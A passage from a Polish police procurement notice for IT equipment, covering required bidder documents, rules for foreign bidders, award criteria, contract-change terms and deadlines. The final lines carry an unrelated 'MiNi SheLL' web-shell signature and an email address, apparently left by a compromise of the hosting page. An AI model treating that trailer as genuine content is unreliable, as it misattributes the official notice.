Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
b)	Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt XIII ppkt 1b lit. b, c, d SIWZ i oświadczenia o braku podstaw do wykluczenia (pkt XIII ppkt 1b lit. a SIWZ) (na podst. § 3 ust. 4 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013r., poz. 231)  . 
3. Na potwierdzenie spełniana przez oferowane usługi wymagań określonych przez Zamawiającego w  SIWZ Zamawiający żąda, aby Wykonawca załączył do oferty:
a)	Oświadczenie (opis) Wykonawcy pn.  Wykaz sprzętu informatycznego - w formie tabeli do wypełnienia przez Wykonawcę w kwestii oferowanego sprzętu i jego parametrów technicznych - zgodnie ze wzorem, który stanowi załącznik nr 8 do SIWZ  Wykaz  sprzętu informatycznego 
UWAGA: do Wykazu sprzętu informatycznego Wykonawca musi załączyć wszystkie dokumenty wymagane przez Zamawiającego - opisane w poszczególnych punktach przedmiotowego Wykazu.
4. Ponadto Wykonawca musi złożyć:
a)	prawidłowo wypełniony i podpisany przez Wykonawcę lub osobę do tego upoważnioną Formularz ofertowy (zał. nr 1 do SIWZ). Wszystkie pola puste i wykropkowane stanowiące o treści oferty Wykonawcy muszą być wypełnione przez Wykonawcę lub osobę do tego upoważnioną; 
b)	w przypadku, gdy Wykonawcę reprezentuje pełnomocnik - upoważnienie lub pełnomocnictwo, określające zakres czynności, do których jest umocowany;
c)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) - oświadczenie o woli współpracy Wykonawców wspólnie przystępujących do postępowania podpisane przez wszystkich Wykonawców. 
Oświadczenie musi zawierać następujące informacje: 
- nazwy i adresy Wykonawców, którzy wspólnie przystępują do postępowania przetargowego;
- wyznaczenie Lidera do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy w sprawie zamówienia publicznego wraz z nazwą zadania - tytułem postępowania. Osoba upoważniona przez Lidera do reprezentowania musi posiadać stosowne upoważnienie (zgodne z pkt XIII ppkt 4 lit. b) SIWZ).
d)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Spółka cywilna) - upoważnienie lub pełnomocnictwo ustanawiające pełnomocnika do reprezentowania s.c. w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy w sprawie zamówienia publicznego.
Uwaga: dokumenty wymienione w pkt XIII ppkt 4 lit. b - d SIWZ Wykonawca musi przedłożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza (wyrok SO w Warszawie - SYGN. AKT V CA 85/07).
e)	prawidłowo wypełnione i podpisane przez Wykonawcę lub osobę upoważnioną Oświadczenie 
o podwykonawcach - załączyć w przypadku udziału podwykonawców (wzór - załącznik nr 5 do SIWZ).
5. Ponadto Zamawiający zaleca załączyć wraz z w/w dokumentami:
podpisany lub zaparafowany przez Wykonawcę lub osobę uprawnioną do reprezentowania Wykonawcy - Projekt Umowy - zał. nr 3 do SIWZ (zaleca się wypełnienie Projektu umowy w części dotyczącej Wykonawcy i jego oferty) - nie jest wymagane załączanie Projektu umowy do oferty. W sytuacji braku w ofercie Projektu Umowy Zamawiający uzna, że Wykonawca zapoznał się z jego treścią i akceptuje zawarte w nim warunki (na podstawie oświadczenia zawartego w Formularzu ofertowym
6. Wykonawcy zagraniczni: 
a)	 Jeżeli, w przypadku Wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, 
o których mowa w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy Pzp mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy Pzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z tym że w przypadku, gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób lub przed notariuszem.
b)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o którym mowa w pkt XIII ppkt 1b lit. b) i d) SIWZ (KRS lub CEIDG i KRK dla art. 24 ust. 1 pkt 9), składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
b.1 nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b.2 nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
c)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt XIII ppkt 1b lit. c) SIWZ (KRK dla art. 24 ust. 1 pkt 4 - 8 i KRK dla art. 24 ust. 1 pkt 10 i 11 ustawy Pzp), składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8, 10 i 11 ustawy Pzp
d)	Dokumenty, o których mowa w lit. b), c) i d) niniejszego ppkt powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
e)	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w lit. b), c) i d) niniejszego ppkt zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Przepis § 4 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013r., poz. 231) stosuje się odpowiednio.
7.  Jeżeli oferta Wykonawców występujących wspólnie (Konsorcjum/Spółka cywilna) zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców (umowa Konsorcjum), w przypadku przedsiębiorców prowadzących działalność w formie Spółki cywilnej - umowę Spółki.
8.  Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę informacji (dokumentów, załączników, oświadczeń itp.) mających wpływ na wynik prowadzonego postępowania powoduje wykluczenie Wykonawcy z przetargu na każdym jego etapie, zgodnie z dyspozycją art. 24 ust. 2 pkt. 3 ustawy Pzp Osoba lub osoby składające ofertę ponoszą pełną odpowiedzialność za treść złożonego oświadczenia woli na zasadach określonych w art. 297 §1 Kodeksu Karnego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres udzielonej gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość wprowadzenia istotnych zmian do zawartej umowy, zgodnie z art. 144 ust. 1 ustawy P.z.p., w stosunku do treści oferty. Istotne zmiany wymagają zgody obu Stron i formy pisemnej pod rygorem nieważności.  
2. Zamawiający przewiduje możliwość dokonania następujących istotnych zmian postanowień zawartej umowy - Warunki zmiany umowy:
a)	istotne zmiany w treści umowy wynikające z błędów pisarskich i rachunkowych (np. w opisie przedmiotu umowy, w wysokości wynagrodzenia kwotowo lub słownie); 
b)	zmiana sposobu/zasad dokonywania rozliczeń i płatności, zmiana płatnika; 
c)	zmiana zakresu realizacji zamówienia przez podwykonawcę na pisemny wniosek Wykonawcy;
d)	zmiana terminu dostawy, jeśli dostawa w wyznaczonym terminie jest utrudniona lub niemożliwa o czas trwania przeszkody;
e)	zmiany związane z zaistnieniem siły wyższej w rozumieniu kodeksu cywilnego, klęski żywiołowej innych przyczyn niezależnych od Stron umowy, powodujące konieczność zmiany któregokolwiek z terminów realizacji umowy lub obowiązków wynikających z umowy, o czas trwania tych przyczyn;
f)	z przyczyn leżących po stronie Zamawiającego, wynikających ze zmiany stosunków społeczno-gospodarczych lub z innych powodów wystąpi konieczność zmiany któregokolwiek z terminów umownych w tym realizacji obowiązków umownych, gwarancyjnych, rękojmi zakresu, bądź innych zapisów, bez zmiany których realizacja umowy będzie utrudniona, niemożliwa lub narazi Zamawiającego na szkodę o czas potrzebny na realizację danej czynności 
3. Strony umowy zobowiązują się do niezwłocznego wzajemnego informowania na piśmie o każdej zmianie danych w dokumentach rejestracyjnych oraz innych danych wymienionych w umowie, a mających wpływ na jej ważność. 
4.Jeżeli występują zmiany w strukturze organizacyjnej Zamawiającego lub Wykonawcy, dotyczące określonych  w umowie nazw, adresów, podległości, rachunków bankowych, danych kontaktowych, Strony niezwłocznie informują pisemnie o tych zmianach. Zmiany takie nie wymagają formy pisemnej w postaci aneksu.
5. W przypadku wyboru oferty Wykonawcy prowadzącego działalność gospodarczą w postaci spółki akcyjnej, część komparacyjną umowy będzie obejmować wyłącznie dane niezbędne do identyfikacji Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubuska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji w Gorzowie Wlkp.
Sekcja ds. Zamówień Publicznych i Funduszy Pomocowych
ul. Kwiatowa 10, 66- 400 Gorzów Wlkp..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2016 godzina 11:00, miejsce: KWP w Gorzowie Wlkp.
Sekcja ds. Zamówień Publicznych i Funduszy Pomocowych
ul. Kwiatowa 10,66-400 Gorzów Wlkp.
Zamawiający dokona otwarcia ofert 14.06.2016r. o godz.11:15 w swojej  siedzibie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zamawiający nie zamierza zawrzeć umowy ramowej. 2. Zamawiający nie zamierza zastosować aukcji elektronicznej przy wyborze najkorzystniejszej oferty. 3. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów. 4. Zamawiający nie przewiduje zamówień uzupełniających. 5. Zamówienie nie dotyczy finansowania projektu/programu ze środków unii Europejskiej. 6. Postępowanie o udzielenie zamówienia, z zastrzeżeniem wyjątków określonych w ustawie, prowadzi się w formie pisemnej (art. 9 ust. 1 ustawy Pzp w powiązaniu z art. 27 ust. 1 i 2 ustawy Pzp), w języku polskim (art. 9 ust. 2 ustawy Pzp). 7. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SIWZ zgodnie z art. 38 ustawy Pzp. Wszelkie zapytania do SIWZ należy kierować do Zamawiającego w formie pisemnej.
8. Wszelkie zapytania dotyczące postępowania o udzielenie zamówienia należy kierować w godzinach urzędowania Zamawiającego tj.:
od godziny 7:30 do 15:30 w dni robocze, na adres Zamawiającego, 
 ul. Kwiatowa 10, 66-400 Gorzów Wlkp., 
Sekcja ds. Zamówień Publicznych i Funduszy Pomocowych,
fax 095/738 14 95, lub e-mail: zamowieniapubliczne@go.policja.gov.pl
9. Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują sobie pisemnie, faksem lub drogą elektroniczną (art. 27 ust. 1 ustawy Pzp). W przypadku wysłania w/w faksem lub drogą elektroniczną konieczne jest dodatkowo wysłanie w/w w formie pisemnej pocztą tradycyjną, za wyjątkiem sytuacji, gdy poczta elektroniczna opatrzona jest bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu. Oświadczenie woli złożone w postaci elektronicznej jest zrównane z formą pisemną tylko wtedy, kiedy jest opatrzone bezpiecznym podpisem elektronicznym weryfikowanym przy pomocy ważnego kwalifikowanego certyfikatu (art. 78 § 2 K.c.).
10.Korespondencja przesłana pisemnie pocztą, kurierem, za pomocą faksu lub pocztą elektroniczną po godzinach urzędowania (tj. która wpłynie do Zamawiającego po godzinie 15:30) zostanie zarejestrowana w następnym dniu pracy Zamawiającego, z zastrzeżeniem art. 38 ust. 1 ustawy Pzp.
11. Zamawiający żąda od Wykonawcy potwierdzenia faktu otrzymania oświadczenia, wniosku, zawiadomienia lub informacji wysyłanych drogą elektroniczną lub faksem (art. 27 ust. 2 ustawy Pzp). 
12. W przypadku rozbieżności pomiędzy treścią niniejszej SIWZ a treścią udzielonych odpowiedzi, jako obowiązującą należy przyjąć treść pisma Zamawiającego z późniejszą datą..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com